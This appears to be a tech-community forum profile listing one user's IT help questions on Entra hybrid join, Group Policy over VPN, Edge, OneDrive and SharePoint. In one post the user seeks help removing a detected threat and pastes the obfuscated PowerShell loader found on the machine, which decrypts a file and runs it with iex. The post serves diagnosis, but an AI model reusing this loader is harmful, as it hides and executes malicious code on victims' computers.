User Profile
MarcoMangiante
Iron Contributor
Joined 9 years ago
User Widgets
Recent Discussions
Entra hybrid join and devices in dual state
Hello, to test hybrid join, I created a lab that reproduces what we have as resources, like domain controller, notebooks and Microsoft 365 accounts and software; initially, we have all our notebooks registered as Entra registered because users have installed and configured the Office and Teams apps on their devices; with Connect agent in advanced mode,I then synced the various notebooks I had in the OUs and therefore obtained the various Entra hybrid joined devices;doing this way, I have the classic case of devices in dual state: I waited a few days as was suggested in the documentation, but nothing happened: in this case, how can I proceed? read other posts and did some tests, for example deleting the Entra registered device:in this case by restarting the notebook, when I try to launch Teams or an Office app I am asked to enter the user, or the user is incorrect and I have to sign out from the app and then sign in;Could I have problems with Outlook and all the mail I have on my devices? Is there any other solution? Another thing I noticed is this: the Entra registered device still presents some data such as the Owner, the User principal name which instead on the device in Hybrid join have as values, N/A and None respectively: in these cases, the the first is seen as a personal device and therefore this data is there and the second is seen as Corporate? Any suggestion is appreciated. -- RegardsNeed help with suspicious "Behavior:Win32/SuspCopy.B"
Hello, the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue. One of the file that I have found is a powershell script like this: try{Import-Certificate:Import-StartLayout Get-PSSessionConfiguration:Import-BinaryMiLog Unregister-UevTemplate:Set-AppvPublishingServer}catch{ $kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi"; try{Add-AppxPackage:Enable-PSBreakpoint Invoke-CommandInDesktopPackage:Get-RunspaceDebug Clear-UevConfiguration:Debug-Process}catch{} $NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"}; if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){ $pAWzZWnnbaODWSIlGcI=@(1..16); $wXXale=[System.Runtime.InteropServices.Marshal] $FJZARstrPhaUvJ= Get-Content "main.sh" $BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI; $qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu); try{Show-EventLog:Get-WheaMemoryPolicy Get-NonRemovableAppsPolicy:Set-AppLockerPolicy Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';} $zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW); try{Write-Host:Publish-AppvClientPackage Set-LocalUser:Invoke-WmiMethod Set-WmiInstance:New-WindowsImage}catch{} $zApeVzJjF -replace "MJqsMVgvkpp" | iex;}} I also tried to do a scan with Microsoft Security Scanner but without a success. Has someone any idea how I could eradicate this threath? -- RegardsGroup Policy via vpn connection
Hello, I created on Windows Server 2016 a group policy to distribute a root CA to my employee notebooks; I tried it in a test lab and it does work, but the test is with a dc vm and a workstation vm inside the same network. All the notebooks now are in the employees house so I tried to test distribute the gpo via the vpn connection to my office network, but it seems that the computer policy is not updated; if I do a simple gpupdate /force I obtain this: Computer policy could not be updated successfully. The following errors were encountered: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator. User Policy could not be updated successfully. The following errors were encountered: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator. To diagnose the failure, review the event log or run GPRESULT /H GPReport.html from the command line to access information about Group Policy results. Where to start the troubleshooting? First of all: is it possible to distribute computer gpo via vpn? MarcoWhat internet site is loaded in Edge process?
Hello, sometimes I use many tabs on new Edge browser and with task manager I see that some msedge.exe processes have high cpu values; many times I tried to do an "End Task" on it but maybe this was not a child process so all the processes of Edge went down; is it possible from Task Manager or other utility (I tried to see if possible in Process Explorer) to see what site is loaded from that particular process? So maybe I know that I can safely end that task and not all the browser processes go down when I do it.Issue scroll pages
Hello, I have an issue scrolling some pages with updated Dev and Canary channel: on some pages, for example on this site, if I scroll, about mid of the page remain blank while the data scrolls in the other mid page; when it arrives at mid of the screen and I try to go down, the blank space go down. I attached some screenshots; the issue seems random; I experienced it on this site, Amazon and Coursera. MarcoVMWare Esxi UI vm window inverted
Hello, I have a visualization issue when I connect to the web viewer of VMWare Esxi 6.5 UI: with Dev Channel browser, if I load the screen of the virtual machine inside the tab, go to another tab and the come back to the vm tab, the screen inside the tab that shows the vm is inverted. I attach a screenshot.Sync Documents, Desktop and Picture folders with another pc
Hello, because I have to move to another pc I don't want to copy and paste all files in Desktop, Documents and Pictures from the old to the new one, so I thought it was quick to use OD4B backup feature that copy on the cloud all the data in these folders. Now, how I can point my new Desktop, Documents and Pictures in the new pc to the folders online in OD4B? Is it simple like change location of the folders to point to the folders online? Thanks. MarSuggestion on custom validation on SharePoint Online list
Hello, I have a list on SharePoint Online where there are 2 date/time fields that I use to enter extra work time; I'd like to do a validationon these fields and I suppose that I have to write some code; the validation is on date (if it is a working day, sunday or an holiday like Christmas, Easter, etc.) and on the hours (signal that for example the user inserted an hour that is not in the extrawork timeframe). Because I have no previous experience on use code to validate something, I'd like to know what is recommended to do now on the "Online" side and how to start quickly and is proficient in short time. I've seen some suggestion aboun jquery, but also in the past: I don't know if it is good on the SPO, it is more used on the "On Premise" side. -- Regards
